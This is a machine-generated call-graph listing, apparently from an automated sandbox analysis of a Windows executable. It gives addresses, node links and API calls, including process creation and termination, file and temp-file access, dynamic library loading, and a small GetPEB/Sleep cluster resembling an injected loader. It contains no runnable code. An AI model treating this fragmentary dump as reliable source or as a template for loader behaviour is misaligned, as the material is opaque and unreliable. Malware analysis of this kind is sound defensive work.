105483->105484 105485 d0e268 105484->105485 105486 cd4e4a 84 API calls 105485->105486 105491 d0e271 105486->105491 105490 cf2d55 _free 58 API calls 105490->105491 105491->105490 105493 cd4e4a 84 API calls 105491->105493 105616 d2f7a1 89 API calls 4 library calls 105491->105616 105493->105491 105494->105483 105494->105491 105495 cd7de1 59 API calls 105494->105495 105598 cd750f 105494->105598 105606 cd735d 105494->105606 105613 d2f73d 59 API calls 2 library calls 105494->105613 105614 d2f65e 61 API calls 2 library calls 105494->105614 105615 d3737f 59 API calls Mailbox 105494->105615 105495->105494 105499 cd34d4 105498->105499 105503 cd34f3 _memmove 105498->105503 105501 cf0db6 Mailbox 59 API calls 105499->105501 105500 cf0db6 Mailbox 59 API calls 105502 cd350a 105500->105502 105501->105503 105502->105463 105503->105500 105504->105460 105506 cd6ab5 105505->105506 105507 d0e41e 105505->105507 105622 cd57a6 60 API calls Mailbox 105506->105622 105689 d2f7a1 89 API calls 4 library calls 105507->105689 105510 d0e431 105690 d2f7a1 89 API calls 4 library calls 105510->105690 105511 cd6ad7 105623 cd57f6 67 API calls 105511->105623 105513 cd6aec 105513->105510 105514 cd6af4 105513->105514 105516 cd7667 59 API calls 105514->105516 105518 cd6b00 105516->105518 105517 d0e44d 105520 cd6b61 105517->105520 105624 cf0957 60 API calls __write_nolock 105518->105624 105522 d0e460 105520->105522 105523 cd6b6f 105520->105523 105521 cd6b0c 105525 cd7667 59 API calls 105521->105525 105526 cd5c6f CloseHandle 105522->105526 105524 cd7667 59 API calls 105523->105524 105527 cd6b78 105524->105527 105528 cd6b18 105525->105528 105529 d0e46c 105526->105529 105530 cd7667 59 API calls 105527->105530 105531 cd4750 60 API calls 105528->105531 105532 cd4ddd 136 API calls 105529->105532 105534 cd6b81 105530->105534 105535 cd6b26 105531->105535 105533 d0e488 105532->105533 105536 d0e4b1 105533->105536 105539 d3955b 122 API calls 105533->105539 105627 cd459b 105534->105627 105625 cd5850 ReadFile SetFilePointerEx 105535->105625 105691 d2f7a1 89 API calls 4 library calls 105536->105691 105543 d0e4a4 105539->105543 105540 cd6b98 105544 cd7b2e 59 API calls 105540->105544 105542 cd6b52 105626 cd5aee SetFilePointerEx SetFilePointerEx 105542->105626 105547 d0e4ac 105543->105547 105548 d0e4cd 105543->105548 105549 cd6ba9 SetCurrentDirectoryW 105544->105549 105545 d0e4c8 105553 cd6d0c Mailbox 105545->105553 105550 cd4e4a 84 API calls 105547->105550 105551 cd4e4a 84 API calls 105548->105551 105555 cd6bbc Mailbox 105549->105555 105550->105536 105552 d0e4d2 105551->105552 105554 cf0db6 Mailbox 59 API calls 105552->105554 105617 cd57d4 105553->105617 105560 d0e506 105554->105560 105557 cf0db6 Mailbox 59 API calls 105555->105557 105559 cd6bcf 105557->105559 105558 cd3bbb 105558->104479 105558->104504 105561 cd522e 59 API calls 105559->105561 105563 cd750f 59 API calls 105560->105563 105562 cd6bda Mailbox __NMSG_WRITE 105561->105562 105564 cd6ce7 105562->105564 105575 d0e7d9 105562->105575 105581 d0e7d1 105562->105581 105583 cd7de1 59 API calls 105562->105583 105678 cd586d 67 API calls _wcscpy 105562->105678 105679 cd6f5d GetStringTypeW 105562->105679 105680 cd6ecc 60 API calls __wcsnicmp 105562->105680 105681 cd6faa GetStringTypeW __NMSG_WRITE 105562->105681 105682 cf363d GetStringTypeW _iswctype 105562->105682 105683 cd68dc 165 API calls 3 library calls 105562->105683 105684 cd7213 59 API calls Mailbox 105562->105684 105594 d0e54f Mailbox 105563->105594 105685 cd5c6f 105564->105685 105566 d0e740 105696 d372df 59 API calls Mailbox 105566->105696 105568 cd6cf3 SetCurrentDirectoryW 105568->105553 105571 d0e762 105697 d4fbce 59 API calls 2 library calls 105571->105697 105574 d0e76f 105576 cf2d55 _free 58 API calls 105574->105576 105700 d2f7a1 89 API calls 4 library calls 105575->105700 105576->105553 105579 d0e7f2 105579->105564 105580 cd750f 59 API calls 105580->105594 105699 d2f5f7 59 API calls 4 library calls 105581->105699 105583->105562 105588 cd7de1 59 API calls 105588->105594 105591 d0e792 105698 d2f7a1 89 API calls 4 library calls 105591->105698 105594->105566 105594->105580 105594->105588 105594->105591 105692 d2f73d 59 API calls 2 library calls 105594->105692 105693 d2f65e 61 API calls 2 library calls 105594->105693 105694 d3737f 59 API calls Mailbox 105594->105694 105695 cd7213 59 API calls Mailbox 105594->105695 105595 d0e7ab 105596 cf2d55 _free 58 API calls 105595->105596 105597 d0e7be 105596->105597 105597->105553 105599 cd75af 105598->105599 105603 cd7522 _memmove 105598->105603 105601 cf0db6 Mailbox 59 API calls 105599->105601 105600 cf0db6 Mailbox 59 API calls 105602 cd7529 105600->105602 105601->105603 105604 cf0db6 Mailbox 59 API calls 105602->105604 105605 cd7552 105602->105605 105603->105600 105604->105605 105605->105494 105607 cd7370 105606->105607 105609 cd741e 105606->105609 105608 cf0db6 Mailbox 59 API calls 105607->105608 105611 cd73a2 105607->105611 105608->105611 105609->105494 105610 cf0db6 59 API calls Mailbox 105610->105611 105611->105609 105611->105610 105612->105481 105613->105494 105614->105494 105615->105494 105616->105491 105618 cd5c6f CloseHandle 105617->105618 105619 cd57dc Mailbox 105618->105619 105620 cd5c6f CloseHandle 105619->105620 105621 cd57eb 105620->105621 105621->105558 105622->105511 105623->105513 105624->105521 105625->105542 105626->105520 105628 cd7667 59 API calls 105627->105628 105629 cd45b1 105628->105629 105630 cd7667 59 API calls 105629->105630 105631 cd45b9 105630->105631 105632 cd7667 59 API calls 105631->105632 105633 cd45c1 105632->105633 105634 cd7667 59 API calls 105633->105634 105635 cd45c9 105634->105635 105636 cd45fd 105635->105636 105637 d0d4d2 105635->105637 105638 cd784b 59 API calls 105636->105638 105639 cd8047 59 API calls 105637->105639 105640 cd460b 105638->105640 105641 d0d4db 105639->105641 105642 cd7d2c 59 API calls 105640->105642 105643 cd7d8c 59 API calls 105641->105643 105644 cd4615 105642->105644 105646 cd4640 105643->105646 105645 cd784b 59 API calls 105644->105645 105644->105646 105649 cd4636 105645->105649 105647 cd4680 105646->105647 105650 cd465f 105646->105650 105660 d0d4fb 105646->105660 105701 cd784b 105647->105701 105652 cd7d2c 59 API calls 105649->105652 105654 cd79f2 59 API calls 105650->105654 105651 cd4691 105655 cd46a3 105651->105655 105658 cd8047 59 API calls 105651->105658 105652->105646 105653 d0d5cb 105656 cd7bcc 59 API calls 105653->105656 105657 cd4669 105654->105657 105659 cd46b3 105655->105659 105662 cd8047 59 API calls 105655->105662 105667 d0d588 105656->105667 105657->105647 105661 cd784b 59 API calls 105657->105661 105658->105655 105664 cd46ba 105659->105664 105665 cd8047 59 API calls 105659->105665 105660->105653 105663 d0d5b4 105660->105663 105673 d0d532 105660->105673 105661->105647 105662->105659 105663->105653 105669 d0d59f 105663->105669 105666 cd8047 59 API calls 105664->105666 105674 cd46c1 Mailbox 105664->105674 105665->105664 105666->105674 105667->105647 105668 cd79f2 59 API calls 105667->105668 105714 cd7924 59 API calls 2 library calls 105667->105714 105668->105667 105671 cd7bcc 59 API calls 105669->105671 105670 d0d590 105672 cd7bcc 59 API calls 105670->105672 105671->105667 105672->105667 105673->105670 105676 d0d57b 105673->105676 105674->105540 105677 cd7bcc 59 API calls 105676->105677 105677->105667 105678->105562 105679->105562 105680->105562 105681->105562 105682->105562 105683->105562 105684->105562 105686 cd5c79 105685->105686 105687 cd5c88 105685->105687 105686->105568 105687->105686 105688 cd5c8d CloseHandle 105687->105688 105688->105686 105689->105510 105690->105517 105691->105545 105692->105594 105693->105594 105694->105594 105695->105594 105696->105571 105697->105574 105698->105595 105699->105575 105700->105579 105702 cd785a 105701->105702 105703 cd78b7 105701->105703 105702->105703 105705 cd7865 105702->105705 105704 cd7d2c 59 API calls 105703->105704 105711 cd7888 _memmove 105704->105711 105706 d0eb09 105705->105706 105707 cd7880 105705->105707 105708 cd8029 59 API calls 105706->105708 105715 cd7f27 59 API calls Mailbox 105707->105715 105710 d0eb13 105708->105710 105712 cf0db6 Mailbox 59 API calls 105710->105712 105711->105651 105713 d0eb33 105712->105713 105714->105667 105715->105711 105717 cd6d95 105716->105717 105722 cd6ea9 105716->105722 105718 cf0db6 Mailbox 59 API calls 105717->105718 105717->105722 105720 cd6dbc 105718->105720 105719 cf0db6 Mailbox 59 API calls 105726 cd6e31 105719->105726 105720->105719 105722->104620 105724 cd735d 59 API calls 105724->105726 105725 cd750f 59 API calls 105725->105726 105726->105722 105726->105724 105726->105725 105729 cd6240 105726->105729 105754 d26553 59 API calls Mailbox 105726->105754 105727->104623 105728->104625 105755 cd7a16 105729->105755 105731 cd646a 105732 cd750f 59 API calls 105731->105732 105733 cd6484 Mailbox 105732->105733 105733->105726 105736 cd6265 105736->105731 105737 cd750f 59 API calls 105736->105737 105738 d0dff6 105736->105738 105739 cd6799 _memmove 105736->105739 105744 cd7d8c 59 API calls 105736->105744 105747 d0df92 105736->105747 105751 cd7e4f 59 API calls 105736->105751 105760 cd5f6c 60 API calls 105736->105760 105761 cd5d41 59 API calls Mailbox 105736->105761 105762 cd5e72 60 API calls 105736->105762 105763 cd7924 59 API calls 2 library calls 105736->105763 105737->105736 105764 d2f8aa 91 API calls 4 library calls 105738->105764 105765 d2f8aa 91 API calls 4 library calls 105739->105765 105741 d0e004 105745 cd750f 59 API calls 105741->105745 105744->105736 105746 d0e01a 105745->105746 105746->105733 105748 cd8029 59 API calls 105747->105748 105749 d0df9d 105748->105749 105753 cf0db6 Mailbox 59 API calls 105749->105753 105752 cd643b CharUpperBuffW 105751->105752 105752->105736 105753->105739 105754->105726 105756 cf0db6 Mailbox 59 API calls 105755->105756 105757 cd7a3b 105756->105757 105758 cd8029 59 API calls 105757->105758 105759 cd7a4a 105758->105759 105759->105736 105760->105736 105761->105736 105762->105736 105763->105736 105764->105741 105765->105733 105766->104639 105767->104638 105769 d0d423 105768->105769 105770 cd4196 105768->105770 105769->105770 105771 d0d42c DestroyIcon 105769->105771 105770->104645 105794 d32f94 62 API calls _W_store_winword 105770->105794 105771->105770 105773 cd4098 105772->105773 105793 cd416f Mailbox 105772->105793 105774 cd7a16 59 API calls 105773->105774 105775 cd40a6 105774->105775 105776 d0d3c8 LoadStringW 105775->105776 105777 cd40b3 105775->105777 105780 d0d3e2 105776->105780 105778 cd7bcc 59 API calls 105777->105778 105779 cd40c8 105778->105779 105779->105780 105781 cd40d9 105779->105781 105782 cd7b2e 59 API calls 105780->105782 105783 cd4174 105781->105783 105784 cd40e3 105781->105784 105787 d0d3ec 105782->105787 105785 cd8047 59 API calls 105783->105785 105786 cd7b2e 59 API calls 105784->105786 105790 cd40ed _memset _wcscpy 105785->105790 105786->105790 105788 cd7cab 59 API calls 105787->105788 105787->105790 105789 d0d40e 105788->105789 105792 cd7cab 59 API calls 105789->105792 105791 cd4155 Shell_NotifyIconW 105790->105791 105791->105793 105792->105790 105793->104651 105794->104645 105796 cde6d5 105795->105796 105797 d13aa9 105796->105797 105800 cde73f 105796->105800 105809 cde799 105796->105809 105885 cd9ea0 105797->105885 105799 d13abe 105825 cde970 Mailbox 105799->105825 105909 d39e4a 89 API calls 4 library calls 105799->105909 105802 cd7667 59 API calls 105800->105802 105800->105809 105801 cd7667 59 API calls 105801->105809 105804 d13b04 105802->105804 105806 cf2d40 __cinit 67 API calls 105804->105806 105805 cf2d40 __cinit 67 API calls 105805->105809 105806->105809 105807 d13b26 105807->104719 105808 cd84c0 69 API calls 105808->105825 105809->105801 105809->105805 105809->105807 105811 cde95a 105809->105811 105809->105825 105810 cd9ea0 331 API calls 105810->105825 105811->105825 105910 d39e4a 89 API calls 4 library calls 105811->105910 105812 d39e4a 89 API calls 105812->105825 105814 cd8d40 59 API calls 105814->105825 105822 cdf195 105914 d39e4a 89 API calls 4 library calls 105822->105914 105823 d13e25 105823->104719 105824 cdea78 105824->104719 105825->105808 105825->105810 105825->105812 105825->105814 105825->105822 105825->105824 105884 cd7f77 59 API calls 2 library calls 105825->105884 105911 d26e8f 59 API calls 105825->105911 105912 d4c5c3 331 API calls 105825->105912 105913 d4b53c 331 API calls Mailbox 105825->105913 105915 cd9c90 59 API calls Mailbox 105825->105915 105916 d493c6 331 API calls Mailbox 105825->105916 105827 cdf4ba 105826->105827 105828 cdf650 105826->105828 105829 cdf4c6 105827->105829 105830 d1441e 105827->105830 105831 cd7de1 59 API calls 105828->105831 106015 cdf290 331 API calls 2 library calls 105829->106015 106017 d4bc6b 331 API calls Mailbox 105830->106017 105837 cdf58c Mailbox 105831->105837 105834 d1442c 105838 cdf630 105834->105838 106018 d39e4a 89 API calls 4 library calls 105834->106018 105836 cdf4fd 105836->105834 105836->105837 105836->105838 105840 cdf5e3 105837->105840 105923 d33c37 105837->105923 105926 d4445a 105837->105926 105935 d3cb7a 105837->105935 105838->104719 105840->105838 106016 cd9c90 59 API calls Mailbox 105840->106016 105844->104719 105845->104719 105846->104719 105847->104657 105848->104662 105849->104719 105850->104664 105851->104664 105852->104664 105853->104719 105854->104719 105855->104719 105857 cd9851 105856->105857 105866 cd984b 105856->105866 105858 cd9857 __itow 105857->105858 105859 cd9899 105857->105859 105860 d0f5d3 __i64tow 105857->105860 105862 d0f4da 105857->105862 105864 cf0db6 Mailbox 59 API calls 105858->105864 106176 cf3698 83 API calls 3 library calls 105859->106176 105860->105860 105867 cf0db6 Mailbox 59 API calls 105862->105867 105872 d0f552 Mailbox _wcscpy 105862->105872 105865 cd9871 105864->105865 105865->105866 105868 cd7de1 59 API calls 105865->105868 105866->104719 105869 d0f51f 105867->105869 105868->105866 105870 cf0db6 Mailbox 59 API calls 105869->105870 105871 d0f545 105870->105871 105871->105872 105873 cd7de1 59 API calls 105871->105873 106177 cf3698 83 API calls 3 library calls 105872->106177 105873->105872 105874->104719 105875->104719 105876->104719 105877->104714 105878->104714 105879->104714 105880->104714 105881->104714 105882->104714 105883->104714 105884->105825 105886 cd9ebf 105885->105886 105904 cd9eed Mailbox 105885->105904 105887 cf0db6 Mailbox 59 API calls 105886->105887 105887->105904 105888 cf2d40 67 API calls __cinit 105888->105904 105889 cdb475 105890 cd8047 59 API calls 105889->105890 105902 cda057 105890->105902 105891 cdb47a 105892 d10055 105891->105892 105908 d109e5 105891->105908 105919 d39e4a 89 API calls 4 library calls 105892->105919 105895 cf0db6 59 API calls Mailbox 105895->105904 105897 d10064 105897->105799 105898 cd8047 59 API calls 105898->105904 105901 cd7667 59 API calls 105901->105904 105902->105799 105903 d26e8f 59 API calls 105903->105904 105904->105888 105904->105889 105904->105891 105904->105892 105904->105895 105904->105898 105904->105901 105904->105902 105904->105903 105905 d109d6 105904->105905 105907 cda55a 105904->105907 105917 cdc8c0 331 API calls 2 library calls 105904->105917 105918 cdb900 60 API calls Mailbox 105904->105918 105921 d39e4a 89 API calls 4 library calls 105905->105921 105920 d39e4a 89 API calls 4 library calls 105907->105920 105922 d39e4a 89 API calls 4 library calls 105908->105922 105909->105825 105910->105825 105911->105825 105912->105825 105913->105825 105914->105823 105915->105825 105916->105825 105917->105904 105918->105904 105919->105897 105920->105902 105921->105908 105922->105902 106019 d3445a GetFileAttributesW 105923->106019 105927 cd9837 84 API calls 105926->105927 105928 d44494 105927->105928 105929 cd6240 94 API calls 105928->105929 105930 d444a4 105929->105930 105931 d444c9 105930->105931 105932 cd9ea0 331 API calls 105930->105932 105934 d444cd 105931->105934 106023 cd9a98 59 API calls Mailbox 105931->106023 105932->105931 105934->105840 105936 cd7667 59 API calls 105935->105936 105937 d3cbaf 105936->105937 105938 cd7667 59 API calls 105937->105938 105939 d3cbb8 105938->105939 105940 d3cbcc 105939->105940 106133 cd9b3c 59 API calls 105939->106133 105942 cd9837 84 API calls 105940->105942 105943 d3cbe9 105942->105943 105944 d3cc0b 105943->105944 105945 d3ccea 105943->105945 105950 d3cd1a Mailbox 105943->105950 105946 cd9837 84 API calls 105944->105946 105947 cd4ddd 136 API calls 105945->105947 105948 d3cc17 105946->105948 105949 d3ccfe 105947->105949 105951 cd8047 59 API calls 105948->105951 105952 d3cd16 105949->105952 105955 cd4ddd 136 API calls 105949->105955 105950->105840 105954 d3cc23 105951->105954 105952->105950 105953 cd7667 59 API calls 105952->105953 105956 d3cd4b 105953->105956 105958 d3cc37 105954->105958 105959 d3cc69 105954->105959 105955->105952 105957 cd7667 59 API calls 105956->105957 105960 d3cd54 105957->105960 105961 cd8047 59 API calls 105958->105961 105962 cd9837 84 API calls 105959->105962 105963 cd7667 59 API calls 105960->105963 105964 d3cc47 105961->105964 105965 d3cc76 105962->105965 105966 d3cd5d 105963->105966 105967 cd7cab 59 API calls 105964->105967 105968 cd8047 59 API calls 105965->105968 105969 cd7667 59 API calls 105966->105969 105970 d3cc51 105967->105970 105971 d3cc82 105968->105971 105972 d3cd66 105969->105972 105973 cd9837 84 API calls 105970->105973 106134 d34a31 GetFileAttributesW 105971->106134 105975 cd9837 84 API calls 105972->105975 105977 d3cc5d 105973->105977 105976 d3cd73 105975->105976 105979 cd459b 59 API calls 105976->105979 105980 cd7b2e 59 API calls 105977->105980 105978 d3cc8b 105981 d3cc9e 105978->105981 105982 cd79f2 59 API calls 105978->105982 105983 d3cd8e 105979->105983 105980->105959 105984 cd9837 84 API calls 105981->105984 105990 d3cca4 105981->105990 105982->105981 105985 cd79f2 59 API calls 105983->105985 105986 d3cccb 105984->105986 105987 d3cd9d 105985->105987 106135 d337ef 75 API calls Mailbox 105986->106135 105989 d3cdd1 105987->105989 105991 cd79f2 59 API calls 105987->105991 105992 cd8047 59 API calls 105989->105992 105990->105950 105993 d3cdae 105991->105993 105994 d3cddf 105992->105994 105993->105989 105997 cd7bcc 59 API calls 105993->105997 105995 cd7b2e 59 API calls 105994->105995 105996 d3cded 105995->105996 105998 cd7b2e 59 API calls 105996->105998 105999 d3cdc3 105997->105999 106000 d3cdfb 105998->106000 106001 cd7bcc 59 API calls 105999->106001 106002 cd7b2e 59 API calls 106000->106002 106001->105989 106003 d3ce09 106002->106003 106004 cd9837 84 API calls 106003->106004 106005 d3ce15 106004->106005 106024 d34071 106005->106024 106007 d3ce26 106008 d33c37 3 API calls 106007->106008 106009 d3ce30 106008->106009 106010 cd9837 84 API calls 106009->106010 106013 d3ce61 106009->106013 106011 d3ce4e 106010->106011 106078 d39155 106011->106078 106014 cd4e4a 84 API calls 106013->106014 106014->105950 106015->105836 106016->105840 106017->105834 106018->105838 106020 d33c3e 106019->106020 106021 d34475 FindFirstFileW 106019->106021 106020->105840 106021->106020 106022 d3448a FindClose 106021->106022 106022->106020 106023->105934 106025 d3408d 106024->106025 106026 d34092 106025->106026 106027 d340a0 106025->106027 106028 cd8047 59 API calls 106026->106028 106029 cd7667 59 API calls 106027->106029 106077 d3409b Mailbox 106028->106077 106030 d340a8 106029->106030 106031 cd7667 59 API calls 106030->106031 106032 d340b0 106031->106032 106033 cd7667 59 API calls 106032->106033 106034 d340bb 106033->106034 106035 cd7667 59 API calls 106034->106035 106036 d340c3 106035->106036 106037 cd7667 59 API calls 106036->106037 106038 d340cb 106037->106038 106039 cd7667 59 API calls 106038->106039 106040 d340d3 106039->106040 106041 cd7667 59 API calls 106040->106041 106042 d340db 106041->106042 106043 cd7667 59 API calls 106042->106043 106044 d340e3 106043->106044 106045 cd459b 59 API calls 106044->106045 106046 d340fa 106045->106046 106047 cd459b 59 API calls 106046->106047 106048 d34113 106047->106048 106049 cd79f2 59 API calls 106048->106049 106050 d3411f 106049->106050 106051 d34132 106050->106051 106052 cd7d2c 59 API calls 106050->106052 106053 cd79f2 59 API calls 106051->106053 106052->106051 106054 d3413b 106053->106054 106055 d3414b 106054->106055 106056 cd7d2c 59 API calls 106054->106056 106057 cd8047 59 API calls 106055->106057 106056->106055 106058 d34157 106057->106058 106059 cd7b2e 59 API calls 106058->106059 106060 d34163 106059->106060 106136 d34223 59 API calls 106060->106136 106062 d34172 106137 d34223 59 API calls 106062->106137 106064 d34185 106065 cd79f2 59 API calls 106064->106065 106066 d3418f 106065->106066 106077->106007 106079 d39162 __write_nolock 106078->106079 106080 cf0db6 Mailbox 59 API calls 106079->106080 106081 d391bf 106080->106081 106082 cd522e 59 API calls 106081->106082 106083 d391c9 106082->106083 106084 d38f5f GetSystemTimeAsFileTime 106083->106084 106085 d391d4 106084->106085 106086 cd4ee5 85 API calls 106085->106086 106087 d391e7 _wcscmp 106086->106087 106088 d3920b 106087->106088 106089 d392b8 106087->106089 106090 d39734 96 API calls 106088->106090 106091 d39734 96 API calls 106089->106091 106092 d39210 106090->106092 106106 d39284 _wcscat 106091->106106 106096 d392c1 106092->106096 106155 cf40fb 58 API calls __wsplitpath_helper 106092->106155 106094 cd4f0b 74 API calls 106095 d392dd 106094->106095 106097 cd4f0b 74 API calls 106095->106097 106096->106013 106099 d392ed 106097->106099 106098 d39239 _wcscat _wcscpy 106156 cf40fb 58 API calls __wsplitpath_helper 106098->106156 106100 cd4f0b 74 API calls 106099->106100 106102 d39308 106100->106102 106103 cd4f0b 74 API calls 106102->106103 106104 d39318 106103->106104 106105 cd4f0b 74 API calls 106104->106105 106107 d39333 106105->106107 106106->106094 106106->106096 106108 cd4f0b 74 API calls 106107->106108 106109 d39343 106108->106109 106110 cd4f0b 74 API calls 106109->106110 106111 d39353 106110->106111 106112 cd4f0b 74 API calls 106111->106112 106113 d39363 106112->106113 106138 d398e3 GetTempPathW GetTempFileNameW 106113->106138 106133->105940 106134->105978 106135->105990 106136->106062 106137->106064 106155->106098 106156->106106 106176->105858 106177->105860 106179 cd7a5f 106178->106179 106180 cd7a85 _memmove 106178->106180 106179->106180 106181 cf0db6 Mailbox 59 API calls 106179->106181 106180->104737 106180->106180 106182 cd7ad4 106181->106182 106183 cf0db6 Mailbox 59 API calls 106182->106183 106183->106180 106184->104738 106185 cd1066 106190 cdf76f 106185->106190 106187 cd106c 106188 cf2d40 __cinit 67 API calls 106187->106188 106189 cd1076 106188->106189 106191 cdf790 106190->106191 106223 ceff03 106191->106223 106195 cdf7d7 106196 cd7667 59 API calls 106195->106196 106197 cdf7e1 106196->106197 106198 cd7667 59 API calls 106197->106198 106199 cdf7eb 106198->106199 106200 cd7667 59 API calls 106199->106200 106201 cdf7f5 106200->106201 106202 cd7667 59 API calls 106201->106202 106203 cdf833 106202->106203 106204 cd7667 59 API calls 106203->106204 106205 cdf8fe 106204->106205 106233 ce5f87 106205->106233 106209 cdf930 106210 cd7667 59 API calls 106209->106210 106211 cdf93a 106210->106211 106261 cefd9e 106211->106261 106213 cdf981 106214 cdf991 GetStdHandle 106213->106214 106215 cdf9dd 106214->106215 106216 d145ab 106214->106216 106218 cdf9e5 OleInitialize 106215->106218 106216->106215 106217 d145b4 106216->106217 106268 d36b38 64 API calls Mailbox 106217->106268 106218->106187 106220 d145bb 106269 d37207 CreateThread 106220->106269 106222 d145c7 CloseHandle 106222->106218 106270 ceffdc 106223->106270 106226 ceffdc 59 API calls 106227 ceff45 106226->106227 106228 cd7667 59 API calls 106227->106228 106229 ceff51 106228->106229 106230 cd7bcc 59 API calls 106229->106230 106231 cdf796 106230->106231 106232 cf0162 6 API calls 106231->106232 106232->106195 106234 cd7667 59 API calls 106233->106234 106235 ce5f97 106234->106235 106236 cd7667 59 API calls 106235->106236 106237 ce5f9f 106236->106237 106277 ce5a9d 106237->106277 106240 ce5a9d 59 API calls 106241 ce5faf 106240->106241 106242 cd7667 59 API calls 106241->106242 106243 ce5fba 106242->106243 106244 cf0db6 Mailbox 59 API calls 106243->106244 106245 cdf908 106244->106245 106246 ce60f9 106245->106246 106247 ce6107 106246->106247 106248 cd7667 59 API calls 106247->106248 106249 ce6112 106248->106249 106250 cd7667 59 API calls 106249->106250 106251 ce611d 106250->106251 106252 cd7667 59 API calls 106251->106252 106253 ce6128 106252->106253 106254 cd7667 59 API calls 106253->106254 106255 ce6133 106254->106255 106256 ce5a9d 59 API calls 106255->106256 106257 ce613e 106256->106257 106258 cf0db6 Mailbox 59 API calls 106257->106258 106259 ce6145 RegisterWindowMessageW 106258->106259 106259->106209 106262 cefdae 106261->106262 106263 d2576f 106261->106263 106265 cf0db6 Mailbox 59 API calls 106262->106265 106280 d39ae7 60 API calls 106263->106280 106267 cefdb6 106265->106267 106266 d2577a 106267->106213 106268->106220 106269->106222 106281 d371ed 65 API calls 106269->106281 106271 cd7667 59 API calls 106270->106271 106272 ceffe7 106271->106272 106273 cd7667 59 API calls 106272->106273 106274 ceffef 106273->106274 106275 cd7667 59 API calls 106274->106275 106276 ceff3b 106275->106276 106276->106226 106278 cd7667 59 API calls 106277->106278 106279 ce5aa5 106278->106279 106279->106240 106280->106266 106282 cd1016 106287 cd4974 106282->106287 106285 cf2d40 __cinit 67 API calls 106286 cd1025 106285->106286 106288 cf0db6 Mailbox 59 API calls 106287->106288 106289 cd497c 106288->106289 106291 cd101b 106289->106291 106294 cd4936 106289->106294 106291->106285 106295 cd493f 106294->106295 106296 cd4951 106294->106296 106297 cf2d40 __cinit 67 API calls 106295->106297 106298 cd49a0 106296->106298 106297->106296 106299 cd7667 59 API calls 106298->106299 106300 cd49b8 GetVersionExW 106299->106300 106301 cd7bcc 59 API calls 106300->106301 106302 cd49fb 106301->106302 106303 cd7d2c 59 API calls 106302->106303 106306 cd4a28 106302->106306 106304 cd4a1c 106303->106304 106305 cd7726 59 API calls 106304->106305 106305->106306 106307 cd4a93 GetCurrentProcess IsWow64Process 106306->106307 106311 d0d864 106306->106311 106308 cd4aac 106307->106308 106309 cd4b2b GetSystemInfo 106308->106309 106310 cd4ac2 106308->106310 106312 cd4af8 106309->106312 106322 cd4b37 106310->106322 106312->106291 106315 cd4b1f GetSystemInfo 106318 cd4ae9 106315->106318 106316 cd4ad4 106317 cd4b37 2 API calls 106316->106317 106319 cd4adc GetNativeSystemInfo 106317->106319 106318->106312 106320 cd4aef FreeLibrary 106318->106320 106319->106318 106320->106312 106323 cd4ad0 106322->106323 106324 cd4b40 LoadLibraryA 106322->106324 106323->106315 106323->106316 106324->106323 106325 cd4b51 GetProcAddress 106324->106325 106325->106323 106326 13c23b0 106340 13c0000 106326->106340 106328 13c24cc 106343 13c22a0 106328->106343 106346 13c3500 GetPEB 106340->106346 106342 13c068b 106342->106328 106344 13c22a9 Sleep 106343->106344 106345 13c22b7 106344->106345 106347 13c352a 106346->106347 106347->106342 106348 d0fdfc 106352 cdab30 Mailbox _memmove 106348->106352 106353 cdb525 106352->106353 106364 cda057 106352->106364 106374 cd7de1 59 API calls 106352->106374 106376 cd9f37 Mailbox 106352->106376 106381 cdb2b6 106352->106381 106383 cd9ea0 331 API calls 106352->106383 106384 d1086a 106352->106384 106386 d10878 106352->106386 106388 d1085c 106352->106388 106389 cdb21c 106352->106389 106391 cf0db6 59 API calls Mailbox 106352->106391 106394 d26e8f 59 API calls 106352->106394 106396 d4445a 331 API calls 106352->106396 106397 d4df23 106352->106397 106402 cd9c90 59 API calls Mailbox 106352->106402 106406 d4c193 85 API calls 2 library calls 106352->106406 106407 d4c2e0 96 API calls Mailbox 106352->106407 106408 d37956 59 API calls Mailbox 106352->106408 106409 d4bc6b 331 API calls Mailbox 106352->106409 106410 d2617e 59 API calls Mailbox 106352->106410 106412 d39e4a 89 API calls 4 library calls 106353->106412 106356 d109e5 106418 d39e4a 89 API calls 4 library calls 106356->106418 106357 d10055 106411 d39e4a 89 API calls 4 library calls 106357->106411 106361 cdb475 106368 cd8047 59 API calls 106361->106368 106362 cf0db6 59 API calls Mailbox 106362->106376 106363 d10064 106365 cdb47a 106365->106356 106365->106357 106368->106364 106370 cd8047 59 API calls 106370->106376 106371 cd7667 59 API calls 106371->106376 106372 cf2d40 67 API calls __cinit 106372->106376 106373 d26e8f 59 API calls 106373->106376 106374->106352 106375 d109d6 106417 d39e4a 89 API calls 4 library calls 106375->106417 106376->106357 106376->106361 106376->106362 106376->106364 106376->106365 106376->106370 106376->106371 106376->106372 106376->106373 106376->106375 106378 cda55a 106376->106378 106400 cdc8c0 331 API calls 2 library calls 106376->106400 106401 cdb900 60 API calls Mailbox 106376->106401 106416 d39e4a 89 API calls 4 library calls 106378->106416 106405 cdf6a3 331 API calls 106381->106405 106383->106352 106414 cd9c90 59 API calls Mailbox 106384->106414 106415 d39e4a 89 API calls 4 library calls 106386->106415 106388->106364 106413 d2617e 59 API calls Mailbox 106388->106413 106403 cd9d3c 60 API calls Mailbox 106389->106403 106391->106352 106392 cdb22d 106404 cd9d3c 60 API calls Mailbox 106392->106404 106394->106352 106396->106352 106419 d4cadd 106397->106419 106399 d4df33 106399->106352 106400->106376 106401->106376 106402->106352 106403->106392 106404->106381 106405->106353 106406->106352 106407->106352 106408->106352 106409->106352 106410->106352 106411->106363 106412->106388 106413->106364 106414->106388 106415->106388 106416->106364 106417->106356 106418->106364 106420 cd9837 84 API calls 106419->106420 106421 d4cb1a 106420->106421 106446 d4cb61 Mailbox 106421->106446 106457 d4d7a5 106421->106457 106423 d4cdb9 106424 d4cf2e 106423->106424 106428 d4cdc7 106423->106428 106496 d4d8c8 92 API calls Mailbox 106424->106496 106427 d4cf3d 106427->106428 106429 d4cf49 106427->106429 106470 d4c96e 106428->106470 106429->106446 106430 cd9837 84 API calls 106440 d4cbb2 Mailbox 106430->106440 106435 d4ce00 106485 cf0c08 106435->106485 106438 d4ce33 106441 cd92ce 59 API calls 106438->106441 106439 d4ce1a 106491 d39e4a 89 API calls 4 library calls 106439->106491 106440->106423 106440->106430 106440->106446 106489 d4fbce 59 API calls 2 library calls 106440->106489 106490 d4cfdf 61 API calls 2 library calls 106440->106490 106443 d4ce3f 106441->106443 106445 cd9050 59 API calls 106443->106445 106444 d4ce25 GetCurrentProcess TerminateProcess 106444->106438 106447 d4ce55 106445->106447 106446->106399 106456 d4ce7c 106447->106456 106492 cd8d40 59 API calls Mailbox 106447->106492 